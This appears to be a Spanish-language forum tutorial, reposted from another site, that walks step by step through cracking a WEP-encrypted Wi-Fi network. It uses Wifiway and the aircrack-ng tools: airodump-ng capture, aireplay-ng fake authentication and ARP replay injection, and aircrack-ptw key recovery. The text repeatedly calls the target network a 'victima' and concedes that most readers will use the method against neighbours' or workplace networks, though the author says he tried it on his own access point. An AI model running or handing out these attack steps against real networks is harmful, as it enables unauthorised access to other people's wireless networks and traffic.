Banner 1

[Tutorial - Auditoria Inalámbrica] Crackear una red inalambrica con clave WEP


:lol: Se oye chido el termino "crackear" :lol: Me siento un "hacker" :lol:

Bueno, antes que nada, cabe recalcar que no sé mucho de Linux, que solo sé lo básico de los comandos, que también sé lo básico sobre redes inalámbricas y que mi conocimiento en el área de seguridad inalámbrica es casi nulo. Asi que si alguien tiene algun comentario que aumente el conocimiento sobre este tema, REALMENTE SERA MUY CHIDO QUE LO HAGA, (al menos para mi).

Toda la información publicada aquí es recopilada y resumida después de horas y horas de navegar por la red y en especial de la webs seguridadwireless.net y el hacker.net. Ya saben, de pronto me entro la curiosidad por “hackear” mi clave WEP.
Hay que ser sinceros de que yo sé, que gran parte de los usuarios que pondrán en práctica el siguiente tuto, lo van hacer unicamente para estar fregando redes de sus vecinos, en su trabajo y para luego presumir con los cuates y sentirse unos grandes “hackers”. Lo sé, porque cuando funcionó con mi red, me sentí muy satisfecho de que el dolor de espalda y las regañadas de mi mama por no dejar en paz la laptop valieran la pena, y de pronto me sentí un “hacker” :lol:

Tampoco les voy a decir como muchos “No me hago responsable de lo que hagan con la información aquí publicada, ya que es con fines educativos”, porque es lógico que no me hago responsable y también es lógico que lo hago con fines educativos porque a pesar de que sé que muchos que nada mas quieren fregar como todos unos verdaderos “lammers”, tambien hay otros que estan deseosos de aprender cosas nuevas (asi como yo).

Bueno, en fin lo de cada quien, espero que no se comporten como unos “lammers”, ya que realmente hacer esto si es de “lammers” (me incluyo), pero el chiste es que aprendan cosas nuevas como buenos informáticos mexicanos que somos :roll: y que se den cuenta que una simple clave WEP no es suficiente para nuestra seguridad, sobre todo si tenemos una empresa.

Basta de tanto sermón y choro, empezamos. Necesitamos:

- Wifiway Tambien esta subido a traves del sistema de descargas PANDO, si alguien lo usa, puedo postear el link de descarga
- Una laptop o una pc con una tarjeta inalambrica
- 20 min de nuestro tiempo y
- Muchas ganas de aprender.

NOTA: Hay tarjetas inalambricas que no son compatibles con este tipo de ataques. No me tome el tiempo de buscar la lista, y tampoco diré cómo saber, te lo dejo a tu cuenta, puedes buscar en las webs de arriba.

Ok, iniciamos desde el cd rom, hacemos unas pequeñas configuraciones sobre el horario, y unos detallitos mas, pueden usar los default presionando “enter” a todos cuando les pregunte.

Antes de comenzar, tenemos que aprendernos algunos terminos:

BSSID: La mac de una tarjeta de red
ESSID: El nombre de la red
AP: Access Point (punto de acceso pero creo que no lo usamos por ahora, nada mas pa que sepan) Viene siendo el router, o el MODEM inalambrico.

Y listo :lol:

Les aparecerá una pantalla verde con amarillo que dice al principio “Welcome to wifiway (wifiway.org)”. En el prompt (Wifiway: #_) escribimos: “startx” y presionamos enter.

Una vez iniciado el ambiente grafico, abrimos una Terminal de consola. Es el tercer botón de izquierda a derecha de la barra de tareas.

1 - Escribimos lo siguiente:
Código:
iwconfig

Debrian aparecer 5 interfaces: lo, eth0, wifi0, rtap0, eth1 y todas deben decir “no wireless extensions”. Si es asi, el wifiway nos ha detectado nuestra tarjeta wifi, sino, dudo mucho que funcione.


2 - Vamos a detectar las redes inalambricas. Escribimos:
Código:
airodump-ng rtap0

Nos aparecerá la siguiente imagen donde veremos las redes a las que podemos acceder, escoge las que tengan encriptacion WEP. Veremos varias columnas, escogemos a nuestra victima, localizamos el canal de la red (CH), el BSSID y el ESSID. Para mayor comodidad yo recomendaria apuntarlo en una hoja de papel.


NOTA: Dejamos abierta esta ventana y abrimos una nueva pestaña (File - New Tab)

3 - Configuración

Tecleamos:

Código:
mousepad /sys/class/net/wifi0/device/channel
Escribimos el canal de nuestra victima, guardamos y cerramos.

Código:
mousepad /sys/class/net/wifi0/device/bssid
Escribimos el BSSID de nuestra victima, guardamos y cerramos.

NOTA: Esta es una imagen de como se ve el archivo a editar


Escribimos
Código:
airodump-ng -c canal_victima -w Nombre_de_un_archivo rtap0

NOTA:"canal_victima" es el canal que hace un momento apuntamos, tienes que reemplazar esta frase por el numero y “Nombre_de_un _archivo” lo podemos cambiar por otra cosa, ejemplo "captura". Aquí se especifica un archivo donde se guardaran las IV’s (Son algo asi como paquetes, no recuerdo la definición exacta, sorry).

NOTA: Una vez que hemos presionado "enter", yo en lo personal recomiendo estar siempre pendientes de la columna "RXQ" u observar varios segundos o minutos si ésta baja a menos de 70, ya que si lo hace es muy probable que el ataque no funcione ya que se encuentra muy lejos el AP. Viene siendo la intensidad de la señal. Dejamos abierta esta pestaña y abrimos otra.


Escribimos
Código:
mousepad /sys/class/net/wifi0/device/rate

Escribimos "2" (obviamente sin comillas), guardamos y cerramos.

4 - Activamos nuestra interfaz wifi0:

Tecleamos:
Código:
Ifconfig wifi0 up


Luego:
Código:
Ifconfig

5 - Buscamos la MAC de nuestra interfaz

Buscamos donde dice “wifi0” y encontramos donde dice "Hwaddr". Apuntamos los primeros 12 numeros, quedaría algo asi:

00:11:22:33:44:55


Esa es la MAC de nuestra interfaz.

6 - Nos asociamos al AP

Abrimos una nueva pestaña y tecleamos:
Código:
aireplay-ng -1 10 -a BSSID_victima -h mac_wifi0 -e ESSID_red wifi0

NOTA: "BSSID_victima", "mac_wifi0" y "ESSID_red" debes cambiarlo por los datos que ya tienes en los primero pasos.

Deberia autentificarnos, si lo logro, aparecera un mensaje que dira “Association Sucessful” al final de la ventana. Esta ventana se actualizara cada 10 segundos


Una vez autentificados, abrimos otra pestaña y tecleamos:

Código:
aireplay-ng -3 -b BSSID_victima -h mac_wifi0 wifi0

NOTA: Nuevamente hacemos los reemplazos necesarios


En esta parte se realiza el ataque al AP, veremos como los numero que se ven en pantalla comenzaran a subir. Nos vamos a la pestaña donde tecleamos “airodump-ng ratp0” y veremos que en la columna que dice “#DATA” tambien comenzaron a subir los numeros. Esperamos unos 10 min hasta que sobrepase los 100,000 data.




7 - Cuando ya haya sobrepasado los 100,000 data, abrimos una consola mas y tecleamos
Código:
ls

Nos apareceran varios archivos y por ahí debe estar nuestro archivo del paso 3 con la extensión .cap, pero al nombre se le habra añadido “-01”
Ejemplo: Nombre_de_un_archivo-01.cap

NOTA: Nuevamente hacemos el cambio por el nombre con el que hayamos nombrado el archivo

Tecleamos
Código:
aircrack-ptw Nombre_de_un_archivo-01.cap

Esperamos unos segundos y en la penultima linea debera aparecer “Found KEY: XX XX XX XX XX XX XX XX XX XX XX XX XX


NOTA: Obviamente no voy a poner mi clave, pero aparecen varios numeros. Lo anotamos y ya podemos cerrar todo, iniciar Windows o Linux. En el caso de Linux cuando te pide la contraseña, te pregunta de que tipo, seleccionamos “Hexadecimal” y escribimos la clave sin los espacios.


Como mencione al principio soy nuevo en esto, asi que no esperen que resuelva todas sus dudas o problemas. Si su duda no se resuelve aquí, preguntenle al sensei informatico, al que todo lo sabe, al diosito y papi google...

Bueno, espero que les funcione, yo lo hice con mi propio AP y usando una tarjeta Intel PRO/Wireless 3945 ABG.

Si les funciona, por favor, posteen el nombre y modelo de la tarjeta inalambrica que usaron para futuros miembros con dudas sobres sus tarjetas.

PD: Este viene siendo el mismo manual que se encuentra en la comunidad seguridadwireless.net, con la diferencia que le agregue imagenes y lo hice un poco mas detallado al respecto pensando en que se les hiciera mas facil entender el tutorial.

En la misma comunidad presentan un videotutorial, lo pueden consultar para mas detalles, a menos que ya tengas un poco de conocimiento sobre comandos en linux, no te recomiendo que lo veas de primero porque no lo vas a entender, lo ponen como un "poquito" avanzado :-p:-p:-p:-p Bueno, esa es mi opinion.


Saludos

Fuente: http://culturahack.com.ar/Foro/index.php?topic=3646.0

No hay comentarios:

Powered by Bad Robot
Helped by Blackubay